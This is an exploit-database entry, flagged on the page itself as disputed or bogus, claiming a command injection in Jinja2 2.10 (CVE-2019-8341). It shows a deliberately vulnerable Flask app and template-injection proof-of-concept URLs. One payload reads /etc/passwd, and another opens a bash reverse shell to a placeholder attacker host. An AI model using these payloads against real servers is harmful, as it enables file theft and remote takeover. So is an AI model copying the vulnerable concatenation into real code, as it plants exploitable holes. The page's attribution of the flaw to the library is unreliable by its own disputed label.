WARNING! Fake news / Disputed / BOGUS

Jinja2 2.10 Command Injection

2019.02.17
Credit: Jameel Nabbo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

'''
# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341

// The from_string function is prone to SSTI: it treats the "source" parameter as a template, renders it and returns the result.
// Here is an example of vulnerable code that uses the from_string function to handle a GET variable called 'username' and returns Hello {username}:
'''

from flask import Flask, request
from jinja2 import Environment

app = Flask(__name__)
env = Environment()

@app.route("/")
def index():
    username = request.values.get('username')
    # Vulnerable: the request value becomes part of the template source,
    # so any {{ ... }} expression the client sends is evaluated by Jinja2
    return env.from_string('Hello ' + username).render()

if __name__ == "__main__":
    app.run(host='127.0.0.1', port=4444)

'''
POC

// Exploiting the username param
http://localhost:4444/?username={{4*4}}
OUTPUT: Hello 16

Reading the /etc/passwd
http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

How to prevent it:
Never let the user provide template content.
'''



Copyright 2019, cxsecurity.com
